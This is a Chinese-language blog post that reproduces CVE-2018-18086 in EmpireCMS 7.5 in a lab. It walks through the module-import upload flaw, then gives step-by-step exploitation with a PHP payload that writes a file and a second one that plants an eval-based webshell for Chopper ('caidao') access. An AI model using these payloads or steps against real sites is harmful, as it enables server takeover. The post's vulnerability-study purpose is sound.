• 帝国CMS(EmpireCMS) v7.5后台getshell分析(CVE-2018-18086)


    帝国CMS(EmpireCMS) v7.5后台getshell分析(CVE-2018-18086)

    一、漏洞描述

    EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。EmpireCMS7.5版本中的/e/class/moddofun.php文件的”LoadInMod”函数存在安全漏洞,攻击者可利用该漏洞上传任意文件。

    二、影响版本

    EmpireCMS<=7.5

    三、环境搭建

    1、官方下载EmpireCMS V7.5 下载地址:http://www.phome.net/download/

    2、把下载的文件中的upload下的所有目录和文件放入到网站根目录下

    3、修改php.ini配置文件, PHP环境中必须开启短标签,不然安装会提示无法安装

      

    4、设置php.ini中 short_open_tag = On,重启phpstudy

      

    5、然后开始安装,安装过程参考: https://jingyan.baidu.com/article/48b37f8dcc014b1a6564887c.html

    四、漏洞复现

    1、查看/e/admin/ecmsmod.php代码

      

    2、跟随LoadInMod函数来到/e/class/moddofun.php,可以看到上传文件处使用make_password(10)对时间进行加密然后拼接成为上传的文件名,这样就无法得到用户名

      

    3、继续浏览代码,在下面发现@include($path),直接包含了这个上传的文件,这时如果在上传文件中添加可以创建文件的代码就可以绕过找不到文件名这个限制了。

      

    4、我们可以构造如下payload:

    <?php file_put_contents(“shell.php”,”<?php phpinfo(); ?>”); ?>

    5、登录后台,点击如下图所示

      

    6、点击”导入系统模型”之后进入如下界面

      

    7、可以上传一个内容为php代码的”.mod”后缀的文件,内容如下:

      

    8、上传1.php.mod文件

      

    9、查看文件,可以看到成功上传

      

    10、浏览访问http://192.168.10.171/empirecms/e/admin/shell.php,可以看到成功执行代码

      

    11、上传一个内容可以getshell的1.php.mod,内容入下:注意需要对$进行转义

    <?php file_put_contents("caidao.php","<?php @eval($_POST[cmd]); ?>");?>

    12、成功上传后,菜刀连接,成功getshell

      

    ------------------------------------------------------------------------------------------

    参考: https://github.com/SukaraLin/php_code_audit_project/issues/1

  • 相关阅读:
    chkconfig命令
    Office 2010 与搜狗输入法兼容问题
    【转】WAS入门简介
    UTF8GB2312GBK
    System.getProperty
    Hibernate 事务方法保存clob类型数据
    Eclipse 或者 Myeclipse 提示选择工作空间设置
    request
    那些操蛋的人生
    Java新手入门很重要的几个基本概念
  • 原文地址:https://www.cnblogs.com/yuzly/p/11359925.html
Copyright © 2020-2023  润新知